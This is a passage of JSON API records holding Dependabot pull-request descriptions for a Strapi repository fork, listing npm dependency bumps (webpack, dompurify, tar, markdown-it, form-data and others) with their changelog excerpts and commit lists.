href=\"https://github.com/webpack/webpack/commit/0c066808d59e4f9406e11bab4ffa2e0feacbd0e2\"\u003e\u003ccode\u003e0c06680\u003c/code\u003e\u003c/a\u003e refactor: update eslint configuration\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/2eb0d6a410513960bd7d65bf15baf15704a612eb\"\u003e\u003ccode\u003e2eb0d6a\u003c/code\u003e\u003c/a\u003e ci: release announcement (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20238\"\u003e#20238\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/b2b24590a08755b706d2009ca97a226addf9e83b\"\u003e\u003ccode\u003eb2b2459\u003c/code\u003e\u003c/a\u003e ci: cancel in progress (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20239\"\u003e#20239\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/webpack/webpack/compare/v5.90.3...v5.104.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `cross-spawn` from 7.0.3 to 7.0.6\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/moxystudio/node-cross-spawn/blob/v6.0.6/CHANGELOG.md\"\u003ecross-spawn's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/compare/v6.0.5...v6.0.6\"\u003e6.0.6\u003c/a\u003e (2024-11-18)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003edisable regexp backtracking (\u003ca href=\"https://redirect.github.com/moxystudio/node-cross-spawn/issues/160\"\u003e#160\u003c/a\u003e) (\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/ba5aaef\"\u003eba5aaef\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e support worker threads (\u003ca href=\"https://redirect.github.com/moxystudio/node-cross-spawn/issues/127\"\u003e#127\u003c/a\u003e) (\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/f4af31c\"\u003ef4af31c\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003c!-- raw HTML omitted --\u003e\u003c!-- raw HTML omitted --\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/d35c865b877d2f9ded7c1ed87521c2fdb689c8dd\"\u003e\u003ccode\u003ed35c865\u003c/code\u003e\u003c/a\u003e chore(release): 6.0.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/5a37e19173a759782e3f716b04c8df90a02daec8\"\u003e\u003ccode\u003e5a37e19\u003c/code\u003e\u003c/a\u003e chore: update package.json and package.lock\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/ba5aaef78340f0a4523a90276306b2f45fc6859a\"\u003e\u003ccode\u003eba5aaef\u003c/code\u003e\u003c/a\u003e fix: disable regexp backtracking (\u003ca href=\"https://redirect.github.com/moxystudio/node-cross-spawn/issues/160\"\u003e#160\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/f4af31c8ee70e1830450755eceac775876b391b9\"\u003e\u003ccode\u003ef4af31c\u003c/code\u003e\u003c/a\u003e fix(core): support worker threads (\u003ca href=\"https://redirect.github.com/moxystudio/node-cross-spawn/issues/127\"\u003e#127\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/moxystudio/node-cross-spawn/compare/v6.0.5...v6.0.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `follow-redirects` from 1.15.1 to 1.15.11\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/21ef28a544c5e57f4c34b8476d75f2144609a1eb\"\u003e\u003ccode\u003e21ef28a\u003c/code\u003e\u003c/a\u003e Release version 1.15.11 of the npm package.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/7c88135da3bd0681a7e156ee66b16b2f6f98b480\"\u003e\u003ccode\u003e7c88135\u003c/code\u003e\u003c/a\u003e Roll back tree shaking.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/6e389ba094beec211a8847788a146917a16c1bdb\"\u003e\u003ccode\u003e6e389ba\u003c/code\u003e\u003c/a\u003e Release version 1.15.10 of the npm package.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/5bc496e0229abda823221e0c6267926a3f93f262\"\u003e\u003ccode\u003e5bc496e\u003c/code\u003e\u003c/a\u003e Shake me up before you go-go.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/694d6b47a42bc8377e5ef1480394de451e16bd5b\"\u003e\u003ccode\u003e694d6b4\u003c/code\u003e\u003c/a\u003e Bump minimist from 1.2.5 to 1.2.8\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/e4e55c77b2d849280d105943f49f42e0c735d05d\"\u003e\u003ccode\u003ee4e55c7\u003c/code\u003e\u003c/a\u003e Release version 1.15.9 of the npm package.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/31a1abf2d659ac1c8fcbe7e614a8c8914d80e1e3\"\u003e\u003ccode\u003e31a1abf\u003c/code\u003e\u003c/a\u003e Attempt much more gentle detection.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/d2aaa97439e8a7e4a9cd02513ec7b12f23c17638\"\u003e\u003ccode\u003ed2aaa97\u003c/code\u003e\u003c/a\u003e Fix url field.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/62558f0cd106195f4c17ece3ad255eb93487d37f\"\u003e\u003ccode\u003e62558f0\u003c/code\u003e\u003c/a\u003e Release version 1.15.8 of the npm package.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/a8d1ceed257d46758f913ff555b4f7e1cd758627\"\u003e\u003ccode\u003ea8d1cee\u003c/code\u003e\u003c/a\u003e Return subtlety.\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/follow-redirects/follow-redirects/compare/v1.15.1...v1.15.11\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `dompurify` from 3.3.1 to 3.3.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/cure53/DOMPurify/releases\"\u003edompurify's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eDOMPurify 3.3.3\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed an engine requirement for Node 20 which caused hiccups, thanks \u003ca href=\"https://github.com/Rotzbua\"\u003e\u003ccode\u003e@​Rotzbua\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eDOMPurify 3.3.2\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a possible bypass caused by jsdom's faulty raw-text tag parsing, thanks multiple reporters\u003c/li\u003e\n\u003cli\u003eFixed a prototype pollution issue when working with custom elements, thanks \u003ca href=\"https://github.com/christos-eth\"\u003e\u003ccode\u003e@​christos-eth\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFixed a lenient config parsing in \u003ccode\u003e_isValidAttribute\u003c/code\u003e, thanks \u003ca href=\"https://github.com/christos-eth\"\u003e\u003ccode\u003e@​christos-eth\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBumped and removed several dependencies, thanks \u003ca href=\"https://github.com/Rotzbua\"\u003e\u003ccode\u003e@​Rotzbua\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFixed the test suite after bumping dependencies, thanks \u003ca href=\"https://github.com/Rotzbua\"\u003e\u003ccode\u003e@​Rotzbua\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cure53/DOMPurify/commit/8bcbf73ae7eb56e7b4f1300b66cf543342c7ee27\"\u003e\u003ccode\u003e8bcbf73\u003c/code\u003e\u003c/a\u003e chore: Preparing 3.3.3 release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cure53/DOMPurify/commit/5faddd60af7b4d612f32a0c6b44432b77c8c490c\"\u003e\u003ccode\u003e5faddd6\u003c/code\u003e\u003c/a\u003e fix: engine requirement (\u003ca href=\"https://redirect.github.com/cure53/DOMPurify/issues/1210\"\u003e#1210\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cure53/DOMPurify/commit/0f91e3add5c028bc4110c513b0c2571b284c35af\"\u003e\u003ccode\u003e0f91e3a\u003c/code\u003e\u003c/a\u003e Update README.md\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cure53/DOMPurify/commit/d5ff1a8c605df1df998c2e7df2c4c8ac762b0dea\"\u003e\u003ccode\u003ed5ff1a8\u003c/code\u003e\u003c/a\u003e Merge branch 'main' of github.com:cure53/DOMPurify\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cure53/DOMPurify/commit/c3efd489010366e755de9d65fd741888fd8b7462\"\u003e\u003ccode\u003ec3efd48\u003c/code\u003e\u003c/a\u003e fix: moved back from jsdom 28 to jsdom 20\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cure53/DOMPurify/commit/988b888108c8df911ef37e68d0e26c85ad90e885\"\u003e\u003ccode\u003e988b888\u003c/code\u003e\u003c/a\u003e fix: moved back from jsdom 28 to jsdom 20\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cure53/DOMPurify/commit/2726c74e9c6a0645127d1630e5ca49f64bc9fe67\"\u003e\u003ccode\u003e2726c74\u003c/code\u003e\u003c/a\u003e chore: Preparing 3.3.2 release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cure53/DOMPurify/commit/6202c7e43e9df01ba606396aed60fbae5583f7a1\"\u003e\u003ccode\u003e6202c7e\u003c/code\u003e\u003c/a\u003e build(deps): bump \u003ccode\u003e@​tootallnate/once\u003c/code\u003e and jsdom (\u003ca href=\"https://redirect.github.com/cure53/DOMPurify/issues/1204\"\u003e#1204\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cure53/DOMPurify/commit/302b51de22535cc90235472c52e3401bedd46f80\"\u003e\u003ccode\u003e302b51d\u003c/code\u003e\u003c/a\u003e fix: Expanded the regex ever so slightly to also cover script\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cure53/DOMPurify/commit/cd85175da3c4614aeb0f1022f2a347e5e9bdd58b\"\u003e\u003ccode\u003ecd85175\u003c/code\u003e\u003c/a\u003e Merge branch 'main' of github.com:cure53/DOMPurify\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/cure53/DOMPurify/compare/3.3.1...3.3.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `svgo` from 3.3.2 to 3.3.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/svg/svgo/releases\"\u003esvgo's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.3.3\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eDependencies\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMigrates from our unsupported fork of sax (\u003ca href=\"https://www.npmjs.com/package/@trysound/sax\"\u003e\u003ccode\u003e@​trysound/sax\u003c/code\u003e\u003c/a\u003e) to the upstream version of sax (\u003ca href=\"https://www.npmjs.com/package/sax\"\u003esax\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eNo longer throws error when encountering comments in DTD.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eMetrics\u003c/h2\u003e\n\u003cp\u003eBefore and after of the browser bundle of each respective version:\u003c/p\u003e\n\u003ctable\u003e\n\u003cthead\u003e\n\u003ctr\u003e\n\u003cth\u003e\u003c/th\u003e\n\u003cth\u003ev3.3.2\u003c/th\u003e\n\u003cth\u003ev3.3.3\u003c/th\u003e\n\u003cth\u003eDelta\u003c/th\u003e\n\u003c/tr\u003e\n\u003c/thead\u003e\n\u003ctbody\u003e\n\u003ctr\u003e\n\u003ctd\u003esvgo.browser.js\u003c/td\u003e\n\u003ctd\u003e910.9 kB\u003c/td\u003e\n\u003ctd\u003e912.9 kB\u003c/td\u003e\n\u003ctd\u003e⬆️ 2 kB\u003c/td\u003e\n\u003c/tr\u003e\n\u003c/tbody\u003e\n\u003c/table\u003e\n\u003ch2\u003eSupport\u003c/h2\u003e\n\u003cp\u003eSVGO v3 is not officially supported, please consider upgrading to SVGO v4 instead. We've backported this fix as there are security implications, but there is no commitment to do this for more complex changes in future.\u003c/p\u003e\n\u003cp\u003eConsider reading our \u003ca href=\"https://svgo.dev/docs/migrations/migration-from-v3-to-v4/\"\u003eMigration Guide from v3 to v4\u003c/a\u003e which should ease the process.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/svg/svgo/commit/bbab162534d89654ac51c30dd6e62d7163b48a5e\"\u003e\u003ccode\u003ebbab162\u003c/code\u003e\u003c/a\u003e deps: upgrade to sax v1.5.0\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/svg/svgo/compare/v3.3.2...v3.3.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `tar` from 7.5.10 to 7.5.11\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/bf776f673164215074b62749e0fe80e5834588f4\"\u003e\u003ccode\u003ebf776f6\u003c/code\u003e\u003c/a\u003e 7.5.11\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad\"\u003e\u003ccode\u003ef48b5fa\u003c/code\u003e\u003c/a\u003e prevent escaping symlinks with drive-relative paths\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/97cff15d3539a37a4095eb3d287147d9d77c2dc3\"\u003e\u003ccode\u003e97cff15\u003c/code\u003e\u003c/a\u003e docs: more security info\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/isaacs/node-tar/compare/v7.5.10...v7.5.11\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `tar` from 7.5.10 to 7.5.11\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/bf776f673164215074b62749e0fe80e5834588f4\"\u003e\u003ccode\u003ebf776f6\u003c/code\u003e\u003c/a\u003e 7.5.11\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad\"\u003e\u003ccode\u003ef48b5fa\u003c/code\u003e\u003c/a\u003e prevent escaping symlinks with drive-relative paths\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/97cff15d3539a37a4095eb3d287147d9d77c2dc3\"\u003e\u003ccode\u003e97cff15\u003c/code\u003e\u003c/a\u003e docs: more security info\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/isaacs/node-tar/compare/v7.5.10...v7.5.11\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `markdown-it` from 13.0.2 to 14.1.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/markdown-it/markdown-it/blob/master/CHANGELOG.md\"\u003emarkdown-it's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[14.1.1] - 2026-01-11\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFixed regression from v13 in linkify inline rule. Specific patterns could\ncause high CPU use. Thanks to \u003ca href=\"https://github.com/ltduc147\"\u003e\u003ccode\u003e@​ltduc147\u003c/code\u003e\u003c/a\u003e for report.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[14.1.0] - 2024-03-19\u003c/h2\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdated CM spec compatibility to 0.31.2, \u003ca href=\"https://redirect.github.com/markdown-it/markdown-it/issues/1009\"\u003e#1009\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFixed quadratic complexity when parsing references, \u003ca href=\"https://redirect.github.com/markdown-it/markdown-it/issues/996\"\u003e#996\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eFixed quadratic output size with pathological user input in tables, \u003ca href=\"https://redirect.github.com/markdown-it/markdown-it/issues/1000\"\u003e#1000\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[14.0.0] - 2023-12-08\u003c/h2\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eDrop ancient browsers support (use \u003ccode\u003e.fromCodePoint\u003c/code\u003e and other features).\u003c/li\u003e\n\u003cli\u003eRewrite to ESM (including all plugins/deps). CJS fallback still available.\nNo signatures changed, except \u003ccode\u003emarkdown-it-emoji\u003c/code\u003e plugin.\u003c/li\u003e\n\u003cli\u003eDropped \u003ccode\u003edist/\u003c/code\u003e folder from repo, build on package publish.\u003c/li\u003e\n\u003cli\u003eSet \u003ccode\u003epunicode.js\u003c/code\u003e as external dependency.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eHtml tokens inside img alt are now rendered as their original text, \u003ca href=\"https://redirect.github.com/markdown-it/markdown-it/issues/896\"\u003e#896\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eHardbreaks inside img alt are now rendered as newlines.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/b4a9b659ef5734223731cfaa3ad5eacc6fc22918\"\u003e\u003ccode\u003eb4a9b65\u003c/code\u003e\u003c/a\u003e 14.1.1 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/4b4bbcae5e0990a5b172378e507b33a59012ed26\"\u003e\u003ccode\u003e4b4bbca\u003c/code\u003e\u003c/a\u003e Fixed perf regression in linkify-it wrapper\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/markdown-it/markdown-it/commit/d2782d892a51201b25d3eeab172201ad5a53a24c\"\u003e\u003ccode\u003ed2782d8\u003c/code\u003e\u003c/a\u003e Add supplementary example-drive...\n\n_Description has been truncated_","html_url":"https://github.com/preechapon250/strapi/pull/10","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/preechapon250%2Fstrapi/issues/10","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/10/packages"},{"uuid":"4107359273","node_id":"PR_kwDOOgwah87MHs6E","number":6,"state":"closed","title":"Bump the npm_and_yarn group across 1 directory with 9 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-04-07T14:57:43.000Z","author_association":null,"state_reason":null,"created_at":"2026-03-20T11:31:54.000Z","updated_at":"2026-04-07T14:57:45.000Z","time_to_close":1567549,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"npm_and_yarn","update_count":9,"packages":[{"name":"form-data","old_version":"2.5.1","new_version":"2.5.5","repository_url":"https://github.com/form-data/form-data"},{"name":"form-data","old_version":"4.0.0","new_version":"4.0.5","repository_url":"https://github.com/form-data/form-data"},{"name":"js-yaml","old_version":"3.14.1","new_version":"3.14.2","repository_url":"https://github.com/nodeca/js-yaml"},{"name":"@octokit/plugin-paginate-rest","old_version":"2.21.3","new_version":"14.0.0","repository_url":"https://github.com/octokit/plugin-paginate-rest.js"},{"name":"brace-expansion","old_version":"1.1.11","new_version":"1.1.12","repository_url":"https://github.com/juliangruber/brace-expansion"},{"name":"flatted","old_version":"3.2.9","new_version":"3.4.2","repository_url":"https://github.com/WebReflection/flatted"},{"name":"minimatch","old_version":"3.1.2","new_version":"3.1.5","repository_url":"https://github.com/isaacs/minimatch"},{"name":"undici","old_version":"5.28.5","new_version":"6.24.1","repository_url":"https://github.com/nodejs/undici"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 7 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [form-data](https://github.com/form-data/form-data) | `2.5.1` | `2.5.5` |\n| [form-data](https://github.com/form-data/form-data) | `4.0.0` | `4.0.5` |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `3.14.1` | `3.14.2` |\n| [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js) | `2.21.3` | `14.0.0` |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `1.1.11` | `1.1.12` |\n| [flatted](https://github.com/WebReflection/flatted) | `3.2.9` | `3.4.2` |\n| [minimatch](https://github.com/isaacs/minimatch) | `3.1.2` | `3.1.5` |\n| [undici](https://github.com/nodejs/undici) | `5.28.5` | `6.24.1` |\n\n\nUpdates `form-data` from 2.5.1 to 2.5.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/form-data/form-data/releases\"\u003eform-data's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.5.2\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eBuffer.from\u003c/code\u003e and \u003ccode\u003eBuffer.alloc\u003c/code\u003e require node 4+\u003c/li\u003e\n\u003cli\u003enpmignore temporary build files (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/532\"\u003e#532\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003emove util.isArray to Array.isArray (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/564\"\u003e#564\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eTests\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003emigrate from travis to GHA\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/form-data/form-data/blob/master/CHANGELOG.md\"\u003eform-data's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v2.5.4...v2.5.5\"\u003ev2.5.5\u003c/a\u003e - 2025-07-18\u003c/h2\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[meta] actually ensure the readme backup isn’t published \u003ca href=\"https://github.com/form-data/form-data/commit/10626c0a9b78c7d3fcaa51772265015ee0afc25c\"\u003e\u003ccode\u003e10626c0\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] use proper dependency \u003ca href=\"https://github.com/form-data/form-data/commit/026abe5c5c0489d8a2ccb59d5cfd14fb63078377\"\u003e\u003ccode\u003e026abe5\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v2.5.3...v2.5.4\"\u003ev2.5.4\u003c/a\u003e - 2025-07-17\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eappend\u003c/code\u003e: avoid a crash on nullish values \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/577\"\u003e\u003ccode\u003e[#577](https://github.com/form-data/form-data/issues/577)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[eslint] update linting config \u003ca href=\"https://github.com/form-data/form-data/commit/8bf2492e0555d41ff58fa04c91593af998f87a3c\"\u003e\u003ccode\u003e8bf2492\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] add \u003ccode\u003eauto-changelog\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/b5101ad3d5f73cfd0143aae3735b92826fd731ea\"\u003e\u003ccode\u003eb5101ad\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] handle predict-v8-randomness failures in node \u0026lt; 17 and node \u0026gt; 23 \u003ca href=\"https://github.com/form-data/form-data/commit/0e93122358414942393d9c2dc434ae69e58be7c8\"\u003e\u003ccode\u003e0e93122\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] Switch to using \u003ccode\u003ecrypto\u003c/code\u003e random for boundary values \u003ca href=\"https://github.com/form-data/form-data/commit/b88316c94bb004323669cd3639dc8bb8262539eb\"\u003e\u003ccode\u003eb88316c\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] validate boundary type in \u003ccode\u003esetBoundary()\u003c/code\u003e method \u003ca href=\"https://github.com/form-data/form-data/commit/131ae5efa30b9c608add4faef3befb38aa2e1bf1\"\u003e\u003ccode\u003e131ae5e\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] Switch to newer v8 prediction library; enable node 24 testing \u003ca href=\"https://github.com/form-data/form-data/commit/c97cfbed9eb6d2d4b5d53090f69ded4bf9fd8a21\"\u003e\u003ccode\u003ec97cfbe\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Refactor] use \u003ccode\u003ehasown\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/97ac9c208be0b83faeee04bb3faef1ed3474ee4c\"\u003e\u003ccode\u003e97ac9c2\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] remove local commit hooks \u003ca href=\"https://github.com/form-data/form-data/commit/be99d4eea5ce47139c23c1f0914596194019d7fb\"\u003e\u003ccode\u003ebe99d4e\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] remove unused deps \u003ca 